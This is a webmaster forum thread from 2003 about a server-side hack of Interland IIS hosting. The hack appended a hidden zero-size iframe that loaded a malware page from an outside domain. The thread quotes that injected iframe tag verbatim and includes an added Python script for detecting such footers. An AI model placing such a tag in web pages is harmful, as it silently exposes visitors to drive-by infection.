My company's site is on an interland windows server. This afternoon 8/28/03 something bizarre began to happen...
Upon loading our site, the URL in the status bar read something like "Opening Page"... www.widgit.com/_vti_con/rip.asp
That is NOT our URL. The status bar should have OUR URL. I called Interland about 6:00pm 8/28/03 and they said they were working to remove the problem.
I learned that there is a Trojan which adds some script to all the HTML files on the WebServer. Interland said they experienced this several months ago, and now, in the last 24 hours a new version of the Trojan has struck back again.
One of our computers at the office started popping Desktop Icons on the Desktop... Its name was malware334.exe
But the real way of seeing if your site is affected is to check the bottom of your HTML page. If infected, the trojan adds an <iframe> tag with an HREF to the beech-info2.com site.
I could say more, but I'm exhausted right now from lack of sleep.
So I just wanted to alert anyone who either SURFS on sites hosted by Interland -OR- manages sites hosted by Interland.
If you surf to an infected site, your computer can become infected, depending on your OS and browser versions.
And if anyone can shed some more light on this matter, I'd be very grateful.
Interland says they have deleted the embedded scripts in the infected HTML files, as well as whatever else needed to be done.
As a precaution, I've taken my site down until I can be sure this problem is truly resolved.
The site does appear to be clean now, however.
I'm wondering if I should just wipe out everything on my virtual server with them and upload a fresh set of files.
I would try to get regular updates from them as to when they will be clean, then go in and check the damage and replace your sites at that time. If you can redirect users to a holding page for a day or so... how long can it take them to sort themselves out?
What else should I do Webmaster World members?
Interestingly, I found a forum B.B. where an earlier version of this trojan was discussed in May 2003, which ALSO affected Interland servers...
It only takes a minute to read, if you're interested.
[edited by: Brett_Tabke at 9:35 am (utc) on Sep. 4, 2003]
If it's an important site that you depend upon for income, always have control of the domain name and access to a backup host, perhaps a multi-host (even a cheapie at a handful of $ per month).
That way, as soon as you hit a problem you can re-point.
Worst scenario then is maybe 24-48 hours. Not wonderful, but a lot better than sitting there a day later with maybe the host still not having sorted the problem. You can always point back if it's sorted quickly... but you can't recapture time if it isn't.
Two quick notes:
1) people who surf the web on WinNT-based systems (including Win NT, Win 2K, and Win XP) should probably add a line to their hosts file pointing www.beech-info2.com to 127.0.0.1, so they don't access this rip.asp file.
2) I FTP'd to the webserver, and it looks like the files aren't being infected - it's IIS that's appending this <IFRAME> tag just before serving the file. The files on my server don't have said <IFRAME> in the code. Just a heads up to anybody running an IIS webserver and looking for this infection. That means re-uploading your files won't help, either, since the files are untouched.
Unfortunately, this doesn't appear to do the trick.
I hope this is fixed soon by Interland, and hope to see some kind of status report from them soon.
You could also add a HTML open comment to the end of every page, that might work. Just <!-- at the end of every page, since this IFRAME is being appended to the end of the file... So the browser will think the IFRAME is a comment and not parse it.
Other than that, add the 127.0.0.1 www.beech-info2.com to your hosts file to keep your *local* machine from being infected. Looks like this IIS infection is just to open up distribution of *another* virus.
My shared server and domain became infected today (9/2/03). The infection seems to be spreading; search the string in Google and it is now up to 5 pages of sites w/infection.
Interland claims to know of the infection and says they have written a job script to remove references and fix the IIS side of things.
It seems, though, that they don't have a good handle on this. The first post in this thread goes back to 8/28 and I was infected at about 4pm Eastern today.
The reseller support tech I worked with knew of the issue, but had no info that would assist me.
That is the latest update from shared-server hosting hell.
Turns out this guy is *actively* hacking Interland. They supposedly have a Microsoft dude flown in, and they're doing a little mano-a-mano. Who knows? The hope is to be "permanently patched in 12 to 24 hours." Ugh.
"Previously unknown IIS exploit," where have I heard those words before...?
Thought I'd add a symptom for those (like me) who get baffled by things disappearing from their web sites.
This is how we first realized something was wrong.
As of 15:50 UTC on Sept 3, my client's web site is still infected. I have strongly recommended to them that they switch to a different ISP (right now, we're redirecting their web site to mine, which doesn't use Interland).
[edited by: DaveAtIFG at 3:59 pm (utc) on Sep. 3, 2003]
The iframe footer is a dynamic footer that has been added to the IIS 5 configuration of the server, aka "Global Footer". Low end hosts use this feature in IIS 5 to add advertisements and other such things to a customer's page. This is not an infection of the web server itself. The source file that the footer is pointing to [wvw.beech-info2.com...] is the source of the trojan virus. NOTE: 'wVw'.beech-info2.com. In order to pull off such a hack you would have to have a script located in Interland's network that ran at a regular interval, along with some other hacking tools to gain access to the server's IIS configuration. There are a lot of legitimate scripts that do this. The only malicious thing about this is the source file rip.asp.
The domain name beech-info2.com is owned by ryan shepherd (firstname.lastname@example.org) but I am sure he is unaware of this situation. If the hacker has half a brain he will have hacked this poor guy's DNS and added an A record to resolve wvw to a different IP than the one that is listed for beech-info2.com. Or the domain was bought under false information; either way it is almost completely untraceable. The bad thing is that all hosts are vulnerable to this. This hacker just chose Interland to wreak havoc on.
There's also ww, www, wvw : beech-info2.com... The TLD and WWW point to one place, all others point to different places. I'd like to know there are no other aliases out there waiting!
The attack on July 28th was the above IP, with a URL in the iframe of IP/cgi-bin/inf.htm, which redirected to a file named readme.pl, which triggered a file download like this time. Maybe the hole from May 18, 2003 was never plugged, and not plugged again on July 28th? To think that the attack this time was exactly one month after the one in July.... Also, with the beech-info.com information on the LabMice.net attack (that was the URL in the iframe), and the beech-info2.com URL, seems pretty certain this is the same guy or gal, or more backlash of the same original hack. All three iframe attacks do appear to be from the same person.
View --> Privacy Report...
If you see something from *.beech-info* then you are seeing a page with the IIS footer set with the malicious iframe tags.
If you add beech-info2.com to your restricted sites zone, you will see an "Unknown (Mixed)" security zone displayed in your IE status bar. I get a "Your current security settings prevent you from running ActiveX controls on this page. As a result, the page may not display correctly." (thankfully) when I visit an infected page.
I currently have one page still affected, but others appear to be fixed. Reloaded and cleared cache, but still there.
I've been away from the FORUMS for a few days since I started this thread. Going nuts with this thing.
Anyway, on Sept 3, we called Interland's Sales people and requested a switch over to a UNIX server.
Within hours I received an email confirmation & then called back to confirm the switch. Then, a few hours later our Domain Name was pointing to the NEW IP address.
So we are through with the IIS server, and it's UNIX from here on out.
The transition went very smoothly working with their sales people.
I'll be uploading a fresh set of files in the coming day or two.
If you don't need the features of a Windows server, you may want to make the switch. Hopefully, this will work out well.
If you do stick with Windows, keep us posted as to your progress with the Bug.
P.S. the rip.asp file as you probably know contains an object tag pointing to a perl file called inf2.pl
I think I have a copy of what reads inside of it. I'll post the info later. It's kind of interesting. But I'm late for work right now. Gotta go.
P.P.S. I have one NEW question about the Nix box. When I used to FTP on win server, the file size was always the same on both "panes" of my WS_FTP program.
But now when I upload a 186 byte file to the Nix box, the remote pane on the Nix server displays the file size as 179 bytes. WHAT'S UP WITH THIS? Thanks for any insights you may have...
<% response.end %>
From a webmaster standpoint, it would be nice to help prevent new browsers from being infected.
Our symptom is that menus are disabled in Internet Explorer. When I look at the source, this is what I see:
<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>
So it *ought* to be commented out, but it's not (the menus are still disabled).
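Two checks from earlier in this thread are worth automating: looking at the bottom of the served HTML for a zero-sized iframe (the first post), and comparing the file you uploaded with the page the server actually returns, since the footer is appended by IIS and never touches the file on disk (the "two quick notes" post). The script below is an added example written for this thread, not code from Interland or from any poster; the page content and the site hostname www.widgit.com are constructed samples, and the iframe tag is the one quoted just above.

```python
"""Detect a server-appended hidden <iframe> footer in served HTML.

Added example for this thread (not code from the thread or from Interland):
compares the file as uploaded with the page as served, because the footer is
appended by the web server and never touches the file on disk.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the page exactly as uploaded over FTP (CRLF line ends).
ON_DISK = (
    "<html><head><title>Widgets</title></head>\r\n"
    "<body><h1>Widgets Inc.</h1></body></html>\r\n"
)

# The injected tag quoted in the thread, appended after the closing </html>.
INJECTED = ('<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp '
            'width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>')

# Constructed sample of the same page as the server returned it.
SERVED = ON_DISK + INJECTED


def _is_zero(value):
    """True for width/height values written as 0, '0' or '0px'."""
    if value is None:
        return False
    digits = str(value).strip().lower().removesuffix("px")
    return digits.isdigit() and int(digits) == 0


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that are sized so the user never sees them."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: v for k, v in attrs}      # html.parser lowercases names
        src = a.get("src") or ""
        if src and (_is_zero(a.get("width")) or _is_zero(a.get("height"))):
            self.hits.append({"src": src, "host": urlparse(src).hostname})


def find_hidden_iframes(html, own_host=None):
    """Return hidden iframes found in html; flag those pointing off-site."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    for hit in parser.hits:
        hit["external"] = own_host is None or hit["host"] != own_host
    return parser.hits


def _normalize(text):
    # FTP ASCII transfers rewrite line endings, so compare content, not bytes.
    return text.replace("\r\n", "\n").strip()


def appended_by_server(on_disk, served):
    """Return whatever the server added after the uploaded file, or None.

    If the served page starts with the on-disk file and carries extra bytes,
    the extra part was injected server-side, so re-uploading cannot fix it.
    """
    disk, live = _normalize(on_disk), _normalize(served)
    if live.startswith(disk) and len(live) > len(disk):
        return live[len(disk):].strip()
    return None


def check_page(on_disk, served, own_host):
    """Combine both checks into one verdict for a single page."""
    tail = appended_by_server(on_disk, served)
    iframes = find_hidden_iframes(served, own_host)
    return {
        "server_side_injection": tail is not None,
        "appended": tail,
        "hidden_iframes": iframes,
        "suspicious": any(h["external"] for h in iframes),
    }


if __name__ == "__main__":
    verdict = check_page(ON_DISK, SERVED, "www.widgit.com")
    print("server-side injection:", verdict["server_side_injection"])
    for frame in verdict["hidden_iframes"]:
        print("hidden iframe ->", frame["host"], "(external)" if frame["external"] else "")
```

In practice you would feed `appended_by_server` the local copy from your FTP client and the body of an HTTP GET of the same URL; a non-empty result with a hidden, off-site iframe in it is exactly the pattern described in this thread, and it tells you the fix belongs in the server configuration, not in your files.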
Don't hold me to this, but our experience with this bug suggests that if you're surfing on IE 5.5 sp2 or IE 6.0 with updated service packs, then the bug's ultimate goal of "infecting" your PC won't be realized.
However, if you surf to an infected site on anything less than IE 5.5 sp2, then your PC could be maliciously infested with malware.exe files and DLL files, which can be difficult to search & destroy.
This is how we learned of the issue last week... One of our older PCs had IE 5.0 and that employee's machine was hit with the desktop exe icons that I mentioned in my 1st message.
Of course, it's still disconcerting to have this thing poking its nose into your PC, but I don't think it will do any real damage if you're updated sufficiently. Again, that's just my opinion.
The inf2.pl file that I mentioned this morning seems to contain the script that creates the malware.exe files on the PC's hard drive. We also identified a file named wiroivd that we believe was associated with the bug, but only on IE 5.0 machines.
We do have rip.asp or rip.htm files in the Cache of our XP machines, but they never successfully retrieved the perl file from the beech-info site.
What we HAVE experienced on XP machines with IE 6 is that "sometimes" a surfer will get a "Network Log In" pop up which requests their UserName and password. The "site" and "realm" listed on the pop up does say beech-info2 however.
Hopefully, most folks would be savvy enough to question this sort of behavior on their PC, though I'm sure many would not.
Also, as mnamesir mentioned, this thing seems to be changing its target URL almost daily. We never experienced that, but another Interland customer that I've been in touch with did say that the URL was being modified from the original beech-info2 domain name.
Of course now that we've switched to unix, everything is back to normal. But I do feel for all of you who are dealing with this issue. Please keep us posted as to your progress.
They also said that they didn't know what this was two weeks ago and were trying to spot clean it one virtual site at a time.
Once they realized it was server-based and that cleaned sites were being re-infected, they moved to a batch script and isolated the servers. For now, that seems to have done the trick.
My sites are all still clean, although I had to clear my cache just to be sure. One clean site was still showing locally as infected until I cleared.